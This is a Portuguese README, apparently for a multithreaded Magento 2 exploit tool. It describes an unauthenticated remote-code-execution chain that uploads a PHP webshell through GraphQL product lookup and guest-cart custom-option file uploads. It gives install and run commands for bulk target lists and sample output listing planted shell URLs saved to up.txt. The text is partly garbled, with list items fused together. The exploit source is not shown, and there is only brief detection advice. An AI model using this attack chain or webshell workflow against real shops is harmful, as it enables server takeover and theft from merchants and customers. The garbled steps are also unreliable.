
Magento 2 Exploit de RCE não autenticado – Faz upload de um webshell PHP via consulta de produto GraphQL + opções personalizadas do carrinho de convidado. Multithread, detecta automaticamente o SKU e salva URLs de shells ativas em up.txt. Somente para testes de segurança autorizados.
⚠️ Esta ferramenta é apenas para testes de segurança educacionais e autorizados. O uso não autorizado contra sistemas que você não possui é ilegal.
Este exploit visa uma vulnerabilidade crítica de execução remota de código (RCE) não autenticada no Magento 2 (Adobe Commerce). Ao combinar a consulta de produtos via GraphQL, a criação de carrinho de convidado e um upload malicioso de arquivo por meio de opções personalizadas de produto, um atacante pode enviar um webshell PHP e obter execução arbitrária de código no servidor alvo.
A vulnerabilidade permite que um atacante remoto escreva um arquivo PHP no sistema de arquivos do servidor e, em seguida, acesse-o para executar comandos do sistema, ler/gravar arquivos e comprometer totalmente a instalação do Magento.
Shinday)up.txt/graphql./rest/default/V1/guest-carts para obter um ID de carrinho./rest/default/V1/guest-carts/{cart_id}/items com um webshell PHP codificado em base64 como arquivo de opção personalizada./pub/media/custom_options/quote/... ou /media/custom_options/quote/....Shinday na resposta.up.txt.Queue, unicode e outros específicos do Python 2)requests, urllib3Instale as dependências:
pip install requests urllib3
python exploit.py <list.txt>
<list.txt> – arquivo contendo as URLs base dos alvos (uma por linha), com ou sem http:///https://.https://example.com
http://shop.test
magento2.target.net
up.txt no diretório atual.python exploit.py targets.txt
[*] Total targets: 5
[*] Start time: 2025-03-15 12:00:00
[*] Starting 5 threads...
[Thread 1] Processing: https://example.com
[+] SKU : 24-WG080
[+] CART : 8f7c3e9a-1b2f-4d5e-9a8b-7c6d5e4f3a2b
[+] Upload Status : 200
[+] Webshell terpasang: https://example.com/pub/media/custom_options/quote/a1/b2/shell_xyz.php
[✓] Saved to up.txt: https://example.com/pub/media/custom_options/quote/a1/b2/shell_xyz.php
O arquivo PHP enviado é um simples gerenciador de arquivos (nomeado como xxxxx_shin.php) que responde às solicitações com um explorador de arquivos baseado na web. Ele contém o marcador exclusivo Shinday, que o script usa para verificar o upload bem-sucedido.
Não deixe este shell em um sistema após o teste – limpe imediatamente.
/media/custom_options/ para arquivos PHP inesperados.Este software é fornecido apenas para fins educacionais e de teste de penetração autorizado. Os autores não são responsáveis por qualquer uso indevido ou dano causado por esta ferramenta. Você deve obter permissão explícita por escrito do proprietário do sistema antes de executar este exploit contra qualquer alvo. O acesso não autorizado a sistemas de computador é uma ofensa criminal na maioria das jurisdições.
Mais avisos: você pode ver o aviso na capa do Jenderal92. Você pode verificá-lo AQUI !!!